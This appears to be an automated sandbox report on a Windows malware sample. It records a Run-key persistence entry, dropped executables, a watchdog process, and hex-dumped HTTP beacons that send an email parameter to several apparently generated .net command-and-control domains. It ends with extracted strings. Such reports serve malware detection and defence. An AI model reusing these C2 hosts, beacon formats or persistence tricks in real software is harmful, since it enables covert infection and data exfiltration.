Analysis Date2014-09-19 05:08:27

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: af7e9629524939de77a8339d91a89da5 sha1: 6b1885c5ca10c7d10b70b06162ba4c7762789cb4 size: 297984
Section.rdata md5: d5f9086296c36525602855461ad749df sha1: 4b18701655a3334fef9cba23525b6b51e73a5e79 size: 33792 md5: fac7905d72a33d234d228e6c483117fd sha1: 3ba61b091445bd10ceb232c1a2fcc06392c6cc49 size: 107520
Timestamp2014-07-24 04:47:37
PackerMicrosoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Center Office Accounts Bus Group Installer ➝
C:\Documents and Settings\Administrator\Application Data\rhbtxpcbvfdiijn\fezozjv.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\rhbtxpcbvfdiijn\fezozjv.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\rhbtxpcbvfdiijn\fezozjv.exe

↳ C:\Documents and Settings\Administrator\Application Data\rhbtxpcbvfdiijn\fezozjv.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\rhbtxpcbvfdiijn\fezozjv.nulm3
Creates FileC:\Documents and Settings\Administrator\Application Data\rhbtxpcbvfdiijn\mybbqyktp.exe
Creates File\Device\Afd\Endpoint
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\rhbtxpcbvfdiijn\fezozjv.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\rhbtxpcbvfdiijn\fezozjv.exe"

Network Details:
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Flows TCP192.168.1.1:1031 ➝
Flows TCP192.168.1.1:1032 ➝
Flows TCP192.168.1.1:1033 ➝
Flows TCP192.168.1.1:1034 ➝
Flows TCP192.168.1.1:1035 ➝
Flows TCP192.168.1.1:1036 ➝
Flows TCP192.168.1.1:1037 ➝
Flows TCP192.168.1.1:1038 ➝
Flows TCP192.168.1.1:1039 ➝
Flows TCP192.168.1.1:1040 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65734073 69676e62   mail=sales@signb
0x00000020 (00032)   69746573 2e636f6d 266d6574 686f643d
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 20707265 73656e74 6265696e   ost: presentbein
0x00000070 (00112)   672e6e65 740d0a0d 0a        

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65734073 69676e62   mail=sales@signb
0x00000020 (00032)   69746573 2e636f6d 266d6574 686f643d
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 20636869 65666265 696e672e   ost: chiefbeing.
0x00000070 (00112)   6e65740d 0a0d0a0d 0a                  net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65734073 69676e62   mail=sales@signb
0x00000020 (00032)   69746573 2e636f6d 266d6574 686f643d
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 20747765 6c766566 6f726576   ost: twelveforev
0x00000070 (00112)   65722e6e 65740d0a 0d0a      

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65734073 69676e62   mail=sales@signb
0x00000020 (00032)   69746573 2e636f6d 266d6574 686f643d
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 20686973 746f7279 666f7265   ost: historyfore
0x00000070 (00112)   7665722e 6e65740d 0a0d0a    

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65734073 69676e62   mail=sales@signb
0x00000020 (00032)   69746573 2e636f6d 266d6574 686f643d
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 20776561 74686572 666f7265   ost: weatherfore
0x00000070 (00112)   7665722e 6e65740d 0a0d0a    

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65734073 69676e62   mail=sales@signb
0x00000020 (00032)   69746573 2e636f6d 266d6574 686f643d
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 20636c61 73736265 796f6e64   ost: classbeyond
0x00000070 (00112)   2e6e6574 0d0a0d0a 0a0d0a              .net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65734073 69676e62   mail=sales@signb
0x00000020 (00032)   69746573 2e636f6d 266d6574 686f643d
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 20746869 6e6b666c 6f776572   ost: thinkflower
0x00000070 (00112)   2e6e6574 0d0a0d0a 0a0d0a              .net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65734073 69676e62   mail=sales@signb
0x00000020 (00032)   69746573 2e636f6d 266d6574 686f643d
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 20707265 73656e74 666c6f77   ost: presentflow
0x00000070 (00112)   65722e6e 65740d0a 0d0a0a    

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65734073 69676e62   mail=sales@signb
0x00000020 (00032)   69746573 2e636f6d 266d6574 686f643d
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 20636f6c 6c656765 636f726e   ost: collegecorn
0x00000070 (00112)   65722e6e 65740d0a 0d0a0a    

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65734073 69676e62   mail=sales@signb
0x00000020 (00032)   69746573 2e636f6d 266d6574 686f643d
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 206f6674 656e666c 6f776572   ost: oftenflower
0x00000070 (00112)   2e6e6574 0d0a0d0a 0d0a0a              .net.......

00-+ CC
         (((((                  H
An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
bad allocation
bad exception
 Base Class Array'
 Base Class Descriptor at (
 Class Hierarchy Descriptor'
 Complete Object Locator'
`copy constructor closure'
- CRT not initialized
dddd, MMMM dd, yyyy
`default constructor closure'
DOMAIN error
dqy sji xncac engwob absp rhnogz lode cfojaderd jahbeevp ooobf irikxaibp psqos rnh qrcu hls bbbu knbijljoo afpjuuq qikneijj gdbo bejewipul jkqi gnnicpm pvzuqb sraiae fome rzmaz apb fbcee ivvs endbupm fjumijdbi cjnuceel fvs munbiplv lxvepu uedkpu bdyorca rtduulw nwdebwa bisciafnc dmj pomp heeblag ledfio mhsoxla lixjagwxun mvsasulbi glbu mbzivr jokzid scduin ubo srecerzev jape rid zcdudfjeiz blgo duajte wouvruxgb bdjokjpoi wpco ftl onelv bzlemn xgoudebfg rznocca jgseoc zzpel ausqsipq flfa iagbyu smje tfcasbgaj oalfes bhsucoi ksgavg pomfojbfib mjno enm afs sfatujtub ilfjiq vyobeioj pocvainct tbjijrde fof jclujwbe eota rznoativ aou jgzut ffujilj dxeba xpcuwkyivf blbeer wfo ueakp sblufndue offcon eupgnomdjo dvhafcmaqc lyqeld pitla xbl fgm clvego nglu gjinuo pzpe moeoxtim uumrlevwc dpsulgveb cjz ovbnelwpel clvebebo ymevazusnu gnucezvwix qtef vpdoeopb scgiscmijl spbih amu plnudqsedp zenko miyzelocpu ffjupvz fublufpsi fgtavsr ifdcuj omcsudcm saiw nmficj pugbosacfe poutjoyiit zucnonkma ecm hjbeaav lrgodpzota nmzegmj ryguqelwaf scmujrjavc paedru lgmoirp sflea kljagimej fld mbaayiml egpmag dnmanfudee czlicp szsiv aud gowitufwmi dlgogwg znop kmomefdomi jdgag vnsinz zaikb vpfi gupu ouili medyagzcu prjudml bgz ubctob ald blgucytus nclof npcaqfgar nbsopna folsug jkcugzuj bagrosya suafke phxasqhud bnneijua mvacomkp tvcua bsgovbane mjpo huzvilacgu pfmevduc xppaodm evncogaf usfluod mmpooi pmc gcfipedd fneeziaecv iecdpe tmgot grsecojfaz ngtaune emgmugpvec ibnwe tgidimhnuc eebi oofv nabya cddadoltas wphirkcumk gsxadmac sne fzliaaxp yccofel lvbo sdnibpna ljj fcg lfvogb ynp lcavajm owjp jxonezj kllo mcgipnja pbcacyuv yklosab doqpamcni cbk frufi ulbpomwzu vgb mvzi qacuvatif xnp csgefpu sbfin pjenu udcpol ppsoe pjcinpla tdkult yrvib tzreuw ekejsipcv tqciae mmsitjrall ujdveni hgda qjacujklel vzvaauos jjzedd ggkobydi jepgabgsi abtganspoa
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
- floating point support not loaded
invalid string position
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
Microsoft Visual C++ Runtime Library
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
`omni callsig'
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
<program name unknown>
- pure virtual function call
runtime error 
Runtime Error!
`scalar deleting destructor'
SING error
string too long
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
TLOSS error
 Type Descriptor'
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
`vbase destructor'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`virtual displacement map'
